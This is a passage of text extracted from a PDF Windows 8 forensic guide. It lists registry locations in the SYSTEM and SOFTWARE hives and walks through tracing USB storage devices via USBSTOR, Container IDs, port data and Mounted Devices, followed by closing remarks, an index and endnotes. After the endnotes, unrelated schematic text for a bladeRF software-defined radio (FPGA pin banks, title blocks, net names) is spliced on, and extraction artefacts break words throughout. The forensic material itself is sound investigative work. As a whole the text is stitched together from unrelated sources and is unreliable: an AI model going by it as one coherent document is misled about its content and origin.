 
%SystemRoot% \Windows \System32 \config \SYSTEM \ 
 
Data Stored  Registry Key Location  
Current Control Set  (Fig-
ure 24 ) Select \Current  
Last Known Good Control 
Set (Figure 25 ) Select \LastKnownGood  
Mounted Devices  (Figures 
26-28) MountedDevices  
Files Excluded from R e-
store  %CurrentControlSet% \Control \BackupRestore  
Computer Name  %CurrentControlSet% \Control \ComputerName  
 
Time Zone  %CurrentControlSet% \Control \TimeZoneInformation \ 
TimeZoneKeyName  
 
Last  Graceful  Shutdown 
Time  (Figure 29 ) %CurrentControlSet% \Control \Windows \ShutdownTime  
(Data stored in Windows FILETIME ) 
 
Printers  %CurrentControlSet% \Enum \SWD \PRINTENUM \ 
FriendlyName  
 
 Sensors & Loc a-
tion Devices   %CurrentControlSet% \Enum \SWD \SensorsAndLocation - 
Enum \HardwareID  
 
USB  Storage  Devices   %CurrentControlSet% \Enum \USB STOR  
 

WINDOWS 8 FORENSIC G UIDE  
54 
Thomson © 2012   
 
 
Figure 44  The Current Control Set is “ 01”.   Whichever Control Set is current, that is 
where a  majority of the system’s information will come from.  Of course, it never 
hurts to check the other control sets.  
Figure 45  The Last Known Good Control Set is “ 01”.   This is the control set that was 
used during the last successful boot.   
 
WINDOWS 8 FORENSIC G UIDE  
55 
Thomson © 2012   
 
 
Figure 46  Four devices were assigned a drive letter.  Note that the devices assigned 
a drive letter are the most recent device to have that drive letter.  
Figure 47  “A” was assigned to “Generic Floppy Drive”    
Figure 48  “E” was assigned to “USB Flash Memory”   
WINDOWS 8 FORENSIC G UIDE  
56 
Thomson © 2012   
 
 
Figure 49  The last graceful shutdown time  
WINDOWS 8 FORENSIC G UIDE  
57 
Thomson © 2012  Sensor and Location Devices  is a new feature implemented with 
Windows 7.  Enabling sensors allows users to have a more person a-
lized experience with the OS and Internet -based activities, to in-
clude GPS informationxxii.  Figure 50 shows that a Location Sensor was enabled on 
Windows 8.  More research needs to be co nducted as there is possibly a yet -to-be-
found log file tha t corresponds to the se nsor and other information relating to the 
device (if that is the type of sensor used)xxiii. 
 
 
Figure 50  The type of Sensor and Location device used on this system is a Location 
Provider  
WINDOWS 8 FORENSIC G UIDE  
58 
Thomson © 2012  USB  STORAGE  DEVICES  
USB storage  devices  that were attached to the system can be uniqu e-
ly identified in the System key by checking  a few  other  keys.   They 
can also be attributed to which port  and hub they were plugged into, 
the date and time stamp, and a drive letter .  If USB storage devices 
were not attached to the system, the USBSTOR  key will not be present ; however, 
you should also  check link files, rest ore points,  shadow copies and “ setup a-
pi.dev.log” , as these may contain evidence of a USB device having been present  
on the system .  Under USBSTOR  (Figure 51), the Registry stores the USB device’s 
friendly name ( Figure 52), and it also stores th e device’s vendor ID, product ID, r e-
vision number, and serial number  (Figure 53).  If the device does not have a serial 
number, Windows will create a Unique Instance ID .  If the second character of the 
serial number is “&”, then it is not a seria l number, but rather a Unique Instance ID, 
which will look similar to the following:  
0&26D88A54&0xxiv 
 Either way, it is referred to as a Unique Instance ID.  
 
  
Figure 51  The USBSTOR key  
WINDOWS 8 FORENSIC G UIDE  
59 
Thomson © 2012   
 
 
Vendor ID  
Device Class/ 
Product  ID Revision #  
Figure 53  USB device information  Figure 52  USB Device Friendly Name   
Unique  
Instance ID  
WINDOWS 8 FORENSIC G UIDE  
60 
Thomson © 2012  In Mounted Devices  (Figure 46), there was a drive letter  for one 
USB device, but in the USBSTOR (Figure 51), there are two USB 
storage devices noted.  So, why is only one of the USB storage d e-
vices assigned a drive letter?  We know that the most recent device plugged into a 
system is assigned a drive letter, but that still doesn’t tell us why only one device has a drive letter.  Did the user try to cover their tracks?  What’s going on in the Registry when a USB storage device is plugged in?  Is it even possible to figure out if a drive letter was assigned to that other USB storage de vice?  
Of course we can figure this out !  It just takes a  bit of digging and note taking.  So 
let’s get started.  
Go to the Unique Instance ID  for the Seagate Portable USB Device (derived from 
the Friendly Name), which was found in Figure 52.  Make a note of the Unique I n-
stance ID because we will need to refer to it a few times throughout this process.  
Under  the Unique Instance ID  find the Container ID and note that value because 
we will need to refer to it a few times throughout this process.  
 
What exactly is a Container ID ?  Beginning with Windows 7, the operating system 
uses Co ntainer IDs for each instance that a physical device installed on the sy s-
tem
xxv. 
 “A system -supplied device identification string that uniquely groups the functional 
devices associated with a single -function or multi -function device...  Starting with 
Windows 7, the Plug- n-Play (PNP) manager us es the Container ID  to group one or 
more device nodes (devnodes) that originated from and belong to each instance of a 
particular physical device.  This instance is referred to as the device containerxxvi.” 
 
Container  
 ID Unique  
Instance ID  
Figure 54  Container ID for Seagate Portable USB Devic e 
WINDOWS 8 FORENSIC G UIDE  
61 
Thomson © 2012  In Figure 54, we found that the Container ID  is {4d18c014 -9d88- 5c15 -bab1 -
7a4c371140d2}.   Remem ber to make note of this value.   Next, go  to the following 
Registry location and search for the Container ID  again :   
Device Containers  %CurrentControlSet% \Control \DeviceContainers \ 
%ContainerID%\ BaseContainers  
AND  
%CurrentControlSet% \Control \DeviceContainers \ 
%ContainerID%\ Properties  
 
 
From Base Containers  (shown above in Figure 18) , find the  same Container ID  that 
was previously identified  in Figure 1 7 and l ook for this GUID : 
 
 
Figure 55  Device Containers  
Figure 56  Properties under the Container ID in Device Containers  Container  
ID 
WINDOWS 8 FORENSIC G UIDE  
62 
Thomson © 2012  Take note of the GUID found here, which may be different than  {87697c82 -6708 -
11e1- 8e1c- 74f06da8e34b}  identified in Figure 56, as this will be needed later on  
when we go back to Mounted Devices . 
In order to figure out why the Seagate Portable USB Device  
doesn’t have a  drive letter , there are a few more steps  (don’t 
worry;  there is a point to this) .   
 
In order to help us  better  understand what’s going on with these USB devices, it 
might benefit us  to figure out the date and time the Seagate Portable USB D evice 
was plugged  into the computer .  Check this location:  
USB Date & Time  %CurrentControlSet% \Enum \USB \%USBDevice% \%Unique  
InstanceID% \Prop erties \{83da6326 -97a6 -4088 -9453 -
a1923f573b29}  
 
 
The third  entry in Figure 57 contained the Windows FILETIME  the Seagate Portable 
USB Device was plugged into the computer  (Figure 58). 
Figure 57  Location for date and time stamp (Windows FILETIME)  
WINDOWS 8 FORENSIC G UIDE  
63 
Thomson © 2012   
 
Next, navigate to the following Registry location  so you can figure out which port  
the USB device was plugged into : 
USB Port  %CurrentControlSet% \Enum \USB \LocationInformation  
 
 
Look for the USB device  you’ve been working with.  This should be easy if you 
noted the device’s Unique Instance Identifier.  
 
 
Figure 59  Port and hub device was plugged into   Figure 58  Seagate Portable USB Device’s date and time stamp  
WINDOWS 8 FORENSIC G UIDE  
64 
Thomson © 2012  In Figure 59, th is USB device was plugged into Port 1 on H ub 
2.  Why should you care?  Knowing the port  number could  
help us figure out why there may not be a drive letter  asso-
ciated with the USB device  and it could also help build a tim e-
line of the user’s activities . 
 
Now go back  to Mounted Devices . 
Mounted Devices  Mounted Devices  
 
 
The GUID that should have been noted from  Figure 56 comes into play here  
({87697c82 -6708 -11e1- 8e1c- 74f06da8e34b}) .  Under Mounted Devices , look for 
that GUID.   
 
Sadly, they do not match, as the GUID noted here is {87697c8 5-6708 -11e1- 8e1c-
74f0da8e34b}.  
 
   Figure 60  Mounted devices  

WINDOWS 8 FORENSIC G UIDE  
65 
Thomson © 2012                                                  
So, at least we 
know it’s prob a-
ble that a diffe r-
ent USB d evice  
was plugged into Port 1, Hub 2 of 
the system prior  to the USB device that 
does have an assigned drive letter .  
Again, check link  files,  restore points , shadow copies, and “setupapi.dev.log”  to 
figure out what the user may have been doing.  
So, why did I go through all of this ?  Again, I knew there were 
two USB storage devices plugged into this system , but only 
one was showing up under Mounted Devices .  So I started di g-
ging .  And  digging.   And ended up in a pretty deep rabbit hole.  
Finally, I figured it out, and since I spent nearly a week trying to 
dig myself out, I thought I’d share . 
Now , to figure out if the USB device that’s present in Mounted Devices  was using 
the same port  and hub as the first one, repeat the steps just described.  
The other USB device that was probably plugged in subsequent to Seagate Por t-
able USB Device was USB Flash Memory USB Device, as indicated by its Friendly Name.   The Unique Instance ID  is 5B8210000091&0.  Under the USB key, its  Loca-
tion Information shows the following:  
OMG!  All that 
work and I still  
don’t have a 
drive letter?!??  
Have no 
fear!  
WINDOWS 8 FORENSIC G UIDE  
66 
Thomson © 2012   
Figure 61 shows that USB Flash Memory USB Device was plugged into Port 1, Hub 
2, which is the same location that the Seagate Portable USB Device was plug ged 
into.  
In order to check  that USB Flash Memory USB Device was plugged in after  Sea-
gate Portable USB Device, the date and time stamp was checked:  
 
This date does indeed occur after the time and date for Seagate Portable USB 
Device, which was March 5, 2012 at 16:29:07.   
So, now we can say it is probable that  Seagate Portable USB Device does not have 
an assigned  drive letter  because USB Flash Memory USB Device was plugged into 
the same port  afterwards.  This gave Seagate Portable USB Device’s drive letter 
 
Figure 61  Location Information of second USB device  
Figure 62  Date and time of USB Flash Memory USB Device  
WINDOWS 8 FORENSIC G UIDE  
67 
Thomson © 2012  to USB Flash Memory USB Device.  Why only “probable”?  Remember that the 
date and time may not be reliable as there  are several situations in which there 
could be discrepancies.  
Knowing the date and time USB Flash Memory USB Device was plugged into the 
system may help you identify where else you can look for information o n Seagate 
Portable USB Device, such as Restore Points and Shadow Copies.  If these exist on 
the system, previous versions of the Registry may have other data that is useful to your examination.    
A timeline can be derived from this information and by examining link files, you may be able to find out wh ich files were being transferred to and from the thumb 
drive (if any).    
 
 
WINDOWS 8 FORENSIC G UIDE  
68 
Thomson © 2012  SOFTWARE  
The SOFTWARE  key contains information about the operating system, such 
as the version, when it was installed, who is the registered owner,  who was 
the last user to log on, and who are the members of a group (if there is one).  
 
%SystemRoot% \Windows \System32 \config \SOFTWARE \ 
 
Data Stored  Registry Key Location  
Current OS Build  Microsoft \Windows NT\CurrentVersion \CurrentBuild  
 
Current OS Ve r-
sion  Microsoft \Windows NT \CurrentVersion \CurrentVersion  
OS Edition  Microsoft \Windows NT \CurrentVersion \EditionID  
 
OS Install Date  Microsoft \Windows NT \CurrentVersion \InstallDate  
 
OS Install Loc a-
tion  Microsoft \Windows NT \CurrentVersion \PathName  
OS Product Name  Microsoft \Windows NT \CurrentVersion \ProductName  
 
Register Organ i-
zation  Microsoft \Windows NT \CurrentVersion \Registered  
Organization  
Registered Owner  Microsoft \Windows NT \CurrentVersion \RegisteredOwner  
 
 Metro 
Apps Installed 
on System  Microsoft \Windows \CurrentVersion \Appx \AppxAllUserStore \ 
Applications  
 
 User A c-
count Installed 
Metro Apps  Microsoft \Windows \CurrentVersion \Appx \AppxAllUserStore \ 
%SID%  
Last Logged On 
User  Microsoft \Windows \CurrentVersion \Authentication \LogonUI \ 
LastLoggedOnUser  
 
Last Logged On 
SAM User  Microsoft \Windows \CurrentVersion \Authentication \LogonUI \ 
LastLoggedOnSAMUser  
 
Last Logged On 
SID User  Microsoft \Windows \CurrentVersion \Authentication \LogonUI \ 
LastLoggedOnSIDUser  
 
Group Members  Microsoft \Windows \CurrentVersion \HomeGroup \HME  
 
WINDOWS 8 FORENSIC G UIDE  
69 
Thomson © 2012  Data Stored  Registry Key Location  
File/Folder Sha r-
ing (by SID)  Microsoft \Windows \CurrentVersion \HomeGroup \HME \ 
SharingPreferences \%SID%  
 
Applications that 
Run at Startup  Microsoft \Windows \CurrentVersion \Run  
 
     
WINDOWS 8 FORENSIC G UIDE  
70 
Thomson © 2012   
  
WINDOWS 8 FORENSIC G UIDE  
71 
Thomson © 2012  Final Thoughts  
 
Several times throughout my re-
search I considered dropping this project b ecause I felt like I had 
gotten myself in way over my 
head.  It was so awful that at one point if I heard “There’s a light at the end of the tunnel” or some variation thereof one more time, that person probably would have ended up with a fork in their skull.  
Part of the problem is the pre s-
sure I place on myself and my ter-
rible procrastination habit, but so far, it’s worked for me, so why change it?   
 When I first set out with this research, I only in tended to come up with about 
35 pages of material.  Silly me forgot that when something bothers me, I b e-
come almost obsessive about it , and  that I have  to try to understand it,  and 
figure it out and make sure it works a second and third time –  this is probably 
also known as curi osity.   
 So, the end result is about 7 0-ish pages of what I hope is usable information 
for the computer forensic community.  As I previously mentioned at the very 
beginning of this guide, I really do hope to keep this research going.  There is so much mor e that can be researched in Windows 8, and where I stated more 
work needs to be done, that’s where I hope to begin  next.   For updates, or if 
you’d like to contribute, please visit http:// propellerheadforensics.com  or fol-
low me on Twitter @propellerhead23 .  Again , please contact me at propelle r-
headforensics@gmail .com  for any suggestions, artifacts and objects you have 
discovered, or criticisms.  
 Two  more  things  and then I’m done  – Thank you Dr. Vincze for supporting this 
research and allowing me to take on t his project.  Also, I  need to thank my 
coworkers, Shawn Howell and Theresa Kline, for their support during the last couple of months  as they are the ones that had to put up with me for 8 hours 
everyday , so thank you for being more than just “colleagues”.  
  

WINDOWS 8 FORENSIC G UIDE  
72 
Thomson © 2012   
  
WINDOWS 8 FORENSIC G UIDE  
73 
Thomson © 2012  Index  
A 
Account Expiration , 53 
Applications that Run at Startup , 73 
B 
Blue Screen of Death. See Error 
Screen  
C 
Charms, 6, 7  
Communication App Web Cache , 32 
Communications App, 2, 32, 44  
Computer Name , 49, 57  
Computer Name & Volume S/N, 49  
contacts , 1, 43  
Container ID , 64, 65  
Cookies, 27, 28, 33  
Credentials, 28 
Current Control Set , 57 
Current OS Build , 72 
Current OS Version , 72 
D 
Desktop, 5, 6, 12, 18, 20, 23, 24  
digital certificates , 34, 35  
Documents and Settings. See 
AppData  
drive letter, 57, 62, 64, 66, 68, 69, 71  
E 
e-mail, 2, 3, 32, 37, 38, 39, 40, 44, 45, 
46 
Error Screen, 10  
F 
File Extension Associations, 49  
File/Folder Sharing , 73 
Files Excluded fr om Restore , 57 G 
Group Members , 73 
I 
IE 10 Websites Visited , 18 
IE Compatibility Mode Cache, 29  
IE Compatibility UA Cache, 29  
IE Download History, 29  
IE Top Level Domain Cache, 29  
IE10 Pinned Favorites, 23  
IE10 Websites Visited, 21  
InPrivate Filtering, 30  
Internet History, 18  
Internet User Name, 53  
J 
Journal Notes , 18, 22  
L 
Last Graceful  Shutdown Time , 57 
Last Known Good Control Set , 57 
Last Logged On SAM User , 73 
Last Logged On SID User , 73 
Last Logged On User , 73 
Last Password Change , 53 
Last Visited Folder, 49  
Libraries, 29  
Local Folder, 17  
login/lock screen, 3  
Logon, 29, 53  
M 
Master Key, 28  
Metro App Cookies , 19, 27  
Metro App Web Cache, 19, 25  
Metro App Web History, 19  
Metro Apps, 5, 18, 20  
Metro Apps Installed on System , 72 
Metro Settings, 19  
Microsoft  folder , 34 
WINDOWS 8 FORENSIC G UIDE  
74 
Thomson © 2012  Mounted Devices , 57, 64, 66, 68, 69, 
70 
N 
Network Shortcuts, 29  
NTUSER.DAT, 49  
O 
OS Edition , 72 
OS Install Date , 72 
OS Install Location , 72 
OS Product Name , 72 
P 
picture sign -in, 4  
Pinned to Task Bar, 28  
port , 62, 67, 68, 70, 71  
Printer Shortcuts, 30  
Printers , 57 
R 
Recent Docs, 49  
Recent User Activity, 30  
Recently Opened/Saved Files, 49  
Recently Opened/Saved Folders, 49  
Recently Run Items, 49  
Recently Used Apps, 49  
Refresh you PC, 8  
Register Organization , 72 
Registered Owner, 72  
Registry,  48 
Reset you PC, 8  
Roaming Folder, 28 
RSA- based Certificates, 28  S 
SAM, 53  
Sensor and Location Devices, 61  
Sensors & Location Devices , 57 
Settings , 46 
SOFTWARE, 72  
Start Menu, 5, 12, 13, 24  
streams, 38, 39  
SYSTEM, 57  
System Restore, 8  
T 
Taskbar Apps, 18  
Temporary Internet Files, 18  
Time Zone , 57 
Travel Logs, 21  
Typed URL Time , 49, 50 
Typed URLs, 49  
U 
Unique Instance ID, 62, 64, 70  
USB storage devices, 62  
USB Storage Devices , 57 
USBSTOR, 57, 62, 64  
User Account Installed Metro Apps , 73 
User Tile , 44, 45, 46 
User’s First Name, 53  
User’s Last Name, 53  
User’s RID , 53 
User’s Tile , 53 
User -Added IE 10 Favorites , 18 
W 
What’s New , 36, 37  
Windows Explorer, 14, 25  
Windows FILETIME , 57, 67  
Windows Sidebar Weather App, 19  
 
 
Thomson © 2012   
  
                                                             
i Windows.  (2012).  Windows 8 Consumer Preview .  Windows.  Retrieved from 
http://windows.microsoft.com/en -US/windows -8/consumer -preview.  
ii Windows 8 Consumer Preview 32 -bit Edition downloaded from: 
http://windows.microsoft.com/en -US/windows -8/iso.  
VMWare Workstation 8: http://downloads.vmware.com/d/info/desktop_end_user_  
computing/vmware_workstation/8_0.  
iii FTK Imager 3 downloaded from:  http ://accessdata.com/support/adownloads.  
iv Guidance Software’s EnCase Forensic: http://www.guidancesoftware.com/  
v Digital Detective.  (2010).  Microsoft Internet Explorer PrivacIE Entries .  Digital Detective.    
Retrieved from http://blog.digital -detective.c o.uk/2010/04/microsoft -internet -explorer -
privacie.html.  
 
vi Microsoft TechNet.  (2012).  How Private Keys Are Stored .  Microsoft TechNet.  Retrieved    
from  http://technet.microsoft.com/en -us/library/cc962112.aspx.  
 
vii Stanek , W.  (2009).  Pre -Press Windows 7 Administrator’s Pocket Guide (pp. 23).  Retrieved   
from download. microsoft .com/.../626997_Win7PktConsult_prePress.pdf.  
 
viii Microsoft TechNet.  (2010).  Managing Roaming User Data Deployment Guide .  Microsoft 
TechNet.  Ret rieved from http://technet.microsoft.com/en -us/library/cc766489(v=ws.10).  
    aspx.  
 
ix These findings are based on this author’s own independent research using a single test pla t-
form.  Results may vary under other circumstances, to include changes made to the opera t-
ing system prior to its official release.  
x It is unknown at this time how “8wekyb3d8bbwe”is derived or what “AC” signifies in the 
Communication App’s location 
xi TechNet.  (2012).  Digital Certificates (Chapter 6) .  Microsoft TechNet.  Retrieved from 
http://technet.microsoft.com/en -us/library/dd361898.aspx  
xii More research will need to be conducted in order to determine if the updates in “What’s 
New ” also include content from other social networking websites.  
xiii More research need s to be conducted in order to ascertain whether the “[#]” in the name 
of the XML file increments sequentially or if it uses a First In, First Out (FIFO) sequence.  
xiv Windows Dev Center.  2012.  File Streams .  Windows Dev Center –  Desktop .  Retrieved 
March 20, 2012, from  http://msdn.microsoft.com/en -us/library/windows/desktop/ 
aa364404(v=vs.85).aspx.  
xv The naming convention of the e -mail stream and the EML file is unknown at this time  
xvi It is unknown at this time how these cont acts  are named, as each contact appears to have a 
random string of numbers associated with their name.  
xvii All contacts  that contained in this Windows 8 image are known to this author.  
 
 
Thomson © 2012                                                                                                                                                                    
xviii It is unknown at the time of this writing what many of the dates and time are referring to 
(last update, last backup, when setting was applied, etc.)  
xix Microsoft Support.  (2008).  Windows registry information for advanced users .  Microsoft 
Support.  Retr ieved from http://support.microsoft.com/kb/256986.  
 
xx Microsoft Support.  (2007).  INFO: Working with the FILETIME structure .  Microsoft  
     Support.  Retrieved from http://support.microsoft.com/kb/188768.  
 
xxi Microsoft Support.  (2006).  Information on L ast Known Good Control Set .  Microsoft Su p-
port.  Retrieved from http://support.microsoft.com/kb/101790.  
 
xxii MSDN.  (2008).  Windows Sensor and Location Platforms .  Microsoft MSDN.  Retrieved  
     from http://archive.msdn .microsoft.com/SensorsAndLocation.  
 
xxiii It is this author’s opinion that forensic examiners will see more information pertaining to 
Sensors and Location Devices, since Windows 8’s goal is to give the user an “immersive” 
experience.  
 
xxiv Carvey, H.  (2009).  Windows Forensic Analysis  (pp. 206 -211).  Burlington, MA: Syngress 
Publishing, Inc.  
 
xxv Dev- Center.  (2012).  Overview of Container IDs.  Windows Dev -Center – Hardware.  R e-
trieved from http://msdn.microsoft.com/en -us/library/windows/hardware/ff549447  
(v=vs. 85).aspx. 
 
xxvi Dev- Center.  (2012).  Container IDs.  Windows Dev -Center – Hardware.  Retrieved from 
http://msdn.microsoft.com/en -us/library/windows/hardware/ff540024(v=vs.85).aspx.  
 
 
 5
54
43
32
21
1D D
C C
B B
A A
bladeRF - Software Defined Radio 
Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
1 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
1 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
1 14 Friday, January 04, 2013 
5
54
43
32
21
1D D
C C
B B
A AC4 handbook pg 171: 
MSEL[3..0] = 
 PS-FAST  = "1100"  @ 3.3/3.0/2.5V 
 PS-STD   = "0000" @3.3/3.0/2.5V 
 FPP-FAST = "1110" @3.3/3.0/2.5V 
 FPP-FAST = "1111" @1.8/1.5 V  (default) MSEL[3..0] 
MSEL pins should be connected 
directly to VCCA or GND. JTAG is on BANK 1 aka VCCIO_L_C4 Config is on BANK 1 aka VCCIO_L_C4 FPGA CONFIGURATION 
TCK 
TDI TDO 
TCK 
TDO 
TMS 
TDI MSEL3 MSEL2 MSEL1 MSEL0 MSEL3 MSEL2 MSEL1 MSEL0 C4_NSTATUS C4_CONFDONE 
TMS C4_NCONFIG 
VCCIO_L_C4 VCCIO_L_C4 VCCIO_L_C4 VCCA_C4 VCCA_C4 VCCA_C4 VCCA_C4 VCCIO_L_C4 VCCIO_L_C4 
VCCIO_L_C4 VCCIO_L_C4 C4_NSTATUS 
C4_DCLK C4_NCONFIG C4_CONFDONE 
Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
2 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
2 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
2 14 Friday, January 04, 2013 R13 
0R13 
0
R18 
DNP R18 
DNP R273 
10K R273 
10K 
R16 
DNP R16 
DNP R252 
1K R252 
1K R256 
10K R256 
10K 
R259 
10K R259 
10K 
R11 
0R11 
0
R254 
1K R254 
1K R14 
DNP R14 
DNP R17 
0R17 
0
JTAG_ICE_CONN J38 
ALTERA_JTAG 
JTAG_ICE_CONN J38 
ALTERA_JTAG TCK 1
TDO 3
TMS 5
NC2 7
TDI 9GND 2
VCC_TRGT 4
NC1 6
NC3 8
GND 10 R255 
10K R255 
10K 
R15 
0R15 
0
R253 
1K R253 
1K EP4CE15A115F484 U43C 
EP4CE15A115F484 U43C 
NCONFIG K5 NSTATUS K6 
MSEL3 K20 TMS L1 
TCK L2 NCE L3 
TDO L4 
TDI L5 MSEL2 L17 MSEL1 L18 MSEL0 M17 CONF_DONE M18 
DCLK K2 
R12 
DNP R12 
DNP 
5
54
43
32
21
1D D
C C
B B
A AAvoid VREF pins due to their slow IO times. 
UDCLK has to be a CTL pin. 
DATA[0..7] have to be from GPIF[0..15] FPGA "LEFT" BANK 
FX3_UART_RX 
FX3_UART_TX LED1 LED2 LED1 
LED2 GPIF6 
GPIF1 GPIF0 GPIF3 
GPIF8 GPIF5 
GPIF10 
GPIF12 
GPIF11 
GPIF13 
GPIF14 FX3_CTL0 
FX3_CTL1 
FX3_CTL6 FX3_CTL2 
FX3_CTL11 
FX3_CTL10 GPIF17 GPIF20 
GPIF16 
GPIF19 GPIF21 GPIF22 
GPIF25 
GPIF27 
GPIF29 FX3_CTL5 
FX3_CTL3 FX3_PCLK FX3_CTL12 
FX3_CTL8 
GPIF28 
GPIF23 
GPIF24 
GPIF30 
GPIF31 
FX3_CTL9 C4_DCLK GPIF15 
GPIF26 FX3_CTL7 
GPIF7 FX3_CTL4 
GPIF9 GPIF4 GPIF2 GPIF18 DAC_SDO 
DAC_SDI 
C4_CLK 
DAC_SCLK 
DAC_CSB 
FX3_UART_TX nFX3_UART_CS FX3_UART_RX 
C4_CONFDONE C4_NCONFIG C4_NSTATUS 
FX3_GPIO50 FX3_GPIO51 FX3_GPIO52 
Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
3 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
3 14 Friday, January 04, 2013 Title 
Size Document Number Rev
Date: Sheet of <Doc> ANuand 
B
3 14 Friday, January 04, 2013 BANK 1 
EP4CE15A115F484 U43D 
BANK 1 
EP4CE15A115F484 U43D 
B1_IO_B1 B1 
B1_IO_B2 B2 
B1_IO_C1 C1 
B1_IO_C2 C2 
B1_IO_D1_DATA1_ASDO D1 
B1_IO_D2 D2 
B1_IO_E1 E1 
B1_IO_E2_FLASH_nCE_nCSO E2 
B1_IO_E3 E3 
B1_IO_E4_NRESET E4 
B1_IO_F1 F1 
B1_IO_F2 F2 
B1_CLK1 G1 
B1_IO_G3 G3 
B1_IO_G5_VREF G5 
B1_IO_H1 H1 
B1_IO_H2 H2 
B1_IO_H5_VREF H5 
B1_IO_H6 H6 
B1_IO_H7_VREF H7 
B1_IO_J1 J1 
B1_IO_J2 J2 
B1_IO_J3_VREF J3 
B1_IO_J4 J4 
B1_IO_J6 J6 
B1_IO_K1_DATA0 K1 BANK 8 
EP4CE15A115F484 U43K 
BANK 8 
EP4CE15A115F484 U43K 
B8_IO_A3_DATA10 A3 
B8_IO_A4 A4 
B8_IO_A5_DATA5 A5 
B8_IO_A6_PADD19 A6 
B8_IO_A7_PADD18 A7 
B8_IO_A8_DATA2 A8 
B8_IO_A9_PADD16 A9 
B8_IO_A10 A10 
B8_CLK10 A11 
B8_IO_B3_DATA11 B3 
B8_IO_B4_DATA8 B4 
B8_IO_B5_VREF B5 
B8_IO_B6_DATA15 B6 
B8_IO_B7_DATA4 B7 
B8_IO_B8_DATA3 B8 
B8_IO_B9_PADD17 B9 
B8_IO_B10_PADD15 B10 
B8_CLK11 B11 
B8_IO_C3 C3 
B8_IO_C4_DATA12 C4 
B8_IO_C6_DATA7 C6 
B8_IO_C7_DATA13 C7 
B8_IO_C8_DATA14 C8 
B8_IO_C10_VREF C10 
B8_IO_D6_VREF D6 
B8_IO_D10 D10 
B8_IO_E5 E5 
B8_IO_E6 E6 
B8_IO_E7 E7 
B8_IO_E9_VREF E9 
B8_IO_F7 F7 
B8_IO_F8_DATA9 F8 
B8_IO_F9 F9 
B8_IO_F10_DATA6 F10 
J64 
HEADER_1x3_100mil J64 
HEADER_1x3_100mil 1
2
3C242 
0.01uF C242 
0.01uF BANK 2 
EP4CE15A115F484 U43E 
BANK 2 
EP4CE15A115F484 U43E 
B2_IO_L6 L6 
B2_IO_M1 M1 
B2_IO_M2 M2 
B2_IO_M3 M3 
B2_IO_M4 M4 
B2_IO_M5_VREF M5 
B2_IO_M6 M6 
B2_IO_N1 N1 
B2_IO_N2 N2 
B2_IO_N5 N5 
B2_IO_N6 N6 
B2_IO_P1 P1 
B2_IO_P2 P2 
B2_IO_P3 P3 
B2_IO_P4 P4 
B2_IO_P5 P5 
B2_IO_R1 R1 
B2_IO_R2 R2 
B2_IO_R5_VREF R5 
B2_CLK3 T1 
B2_CLK2 T2 
B2_IO_T3_VREF T3 
B2_IO_T4 T4 
B2_IO_T5 T5 
B2_IO_U1 U1 
B2_IO_U2 U2 
B2_IO_V1 V1 
B2_IO_V2 V2 
B2_IO_V3 V3 
B2_IO_V4 V4 
B2_IO_W1 W1 
B2_IO_W2 W2 
B2_IO_Y1 Y1 
B2_IO_Y2 Y2 
B2_IO_AA1 AA1 
D12 D12 BANK 3 
EP4CE15A115F484 U43F 
BANK 3 
EP4CE15A115F484 U43F 
B3_IO_U9 U9 
B3_IO_U10 U10 
B3_IO_U11_VREF U11 
B3_IO_V5 V5 
B3_IO_V8 V8 
B3_IO_V9_VREF V9 
B3_IO_V10 V10 
B3_IO_V11 V11 
B3_IO_W6 W6 
B3_IO_W7 W7 
B3_IO_W8 W8 
B3_IO_W10 W10 
B3_IO_Y3 Y3 
B3_IO_Y4_VREF Y4 
B3_IO_Y6 Y6 
B3_IO_Y7 Y7 
B3_IO_Y8 Y8 
B3_IO_Y10 Y10 
B3_IO_AA3 AA3 
B3_IO_AA4 AA4 
B3_IO_AA5 AA5 
B3_IO_AA7 AA7 
B3_IO_AA8 AA8 
B3_IO_AA9 AA9 
B3_IO_AA10 AA10 
B3_CLK15 AA11 
B3_IO_AB3 AB3 
B3_IO_AB4_VREF AB4 
B3_IO_AB5 AB5 
B3_IO_AB7 AB7 
B3_IO_AB8 AB8 
B3_IO_AB9 AB9 
B3_IO_AB10 AB10 
B3_CLK14 AB11 
D11 D11 
5
54
43
32
21
1D D
C C
B B
A ALMS SIGNALS GO TO THE "RIGHT" OF THE C4 
BANKS 4, 5, 6, 7 Avoid VREF pins due to their slow IO times. FPGA "RIGHT" BANK 
EXP_PRSNT 
EXP_SPI_MOSI EXP_SPI_CLK 
EXP_SPI_MISO 
EXP_GPIO_1 
EXP_GPIO_2 EXP_GPIO_9 
EXP_GPIO_10 
EXP_GPIO_3 EXP_GPIO_11 
EXP_GPIO_4 EXP_GPIO_12 
EXP_GPIO_13 EXP_GPIO_5 
EXP_GPIO_15 
EXP_GPIO_16 EXP_GPIO_7 
EXP_GPIO_8 EXP_GPIO_14 EXP_GPIO_6 
EXP_SPI_CLK EXP_GPIO_10 EXP_GPIO_9 
EXP_GPIO_11 
EXP_GPIO_12 
EXP_GPIO_13 
EXP_GPIO_14 
EXP_GPIO_15 
EXP_GPIO_16 
EXP_PRSNT 
EXP_SPI_MISO EXP_SPI_MOSI 
EXP_GPIO_1 
EXP_GPIO_2 
EXP_GPIO_3 
EXP_GPIO_4 
EXP_GPIO_5 
EXP_GPIO_7 EXP_GPIO_6 
EXP_GPIO_8 VCCIO_R_C4 
EXP_CLK 
V5P0 V5P0 
LMS_RX_IQ_SEL 
LMS_RXD0 LMS_RXD3 
LMS_RXD4 LMS_RXD5 
LMS_RXD6 LMS_RXD7 LMS_RXD8 
LMS_RXD9 LMS_RXD10 
LMS_RXD11 
LMS_TX_IQ_SEL LMS_TXD0 
LMS_TXD1 LMS_RXD2 LMS_TXD2 
LMS_TXD3 LMS_TXD4 LMS_TXD5 
LMS_TXD6 LMS_TXD7 
LMS_TXD8 
LMS_TXD9 LMS_TXD10 
LMS_TXD11 LMS_RXD1 
LMS_RX_CLK 
